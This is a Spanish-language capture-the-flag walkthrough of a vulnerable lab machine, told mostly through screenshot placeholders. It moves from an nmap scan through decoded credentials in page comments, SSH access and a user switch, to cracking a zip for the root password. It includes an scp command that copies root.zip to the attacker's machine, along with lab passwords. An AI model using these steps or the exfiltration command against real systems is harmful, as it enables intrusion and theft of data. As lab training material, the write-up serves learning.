Hacemos el escaneo con nmap: {{pasted_image_20230925091918.png|}} Y esta es la web: {{pasted_image_20230925091928.png|}} Si vemos el código fuente vemos este comentario: {{pasted_image_20230925092052.png|}} Por lo que accedemos aquí: {{pasted_image_20230925092109.png|}} Y volvemos a ver otro comentario: {{pasted_image_20230925092124.png|}} {{pasted_image_20230925092136.png|}} Y en la parte de la derecha del todo vemos unas líneas que ponen user y abajo del todo una pass: {{pasted_image_20230925092308.png|}} {{pasted_image_20230925092215.png|}} Sacamos la contraseña con cyberchef aplicándole el filtro de magic: {{pasted_image_20230925092500.png|}} Y sacamos el user de la misma forma: {{pasted_image_20230925092523.png|}} alice:IwillGoDeeper Probamos en acceder vía ssh y vemos que funciona: {{pasted_image_20230925092649.png|}} Viendo archivos ocultos nos encontramos con un .bob.txt: {{pasted_image_20230925092822.png|}} 535746745247566c634556756233566e61413d3d {{pasted_image_20230925092857.png|}} Que nos extrae lo siguiente: IamDeepEnough Y usando esta clave nos convertimos en el usuario bob: {{pasted_image_20230925092957.png|}} Y dentro de la raíz nos encontramos con un archivo zip: {{pasted_image_20230925093026.png|}} Vamos a enviarnos este archivo por scp a nuestra máquina atacante: scp root.zip kali@192.168.0.63:/home/kali/Desktop/ {{pasted_image_20230925093528.png|}} {{pasted_image_20230925093535.png|}} Y tenemos una contraseña que tendremos que crackear usando john the ripper: {{pasted_image_20230925093604.png|}} Y vemos que la contraseña es bob: {{pasted_image_20230925093653.png|}} Y ya tenemos la password de root: root:IhateMyPassword {{pasted_image_20230925093713.png|}} {{pasted_image_20230925093739.png|}}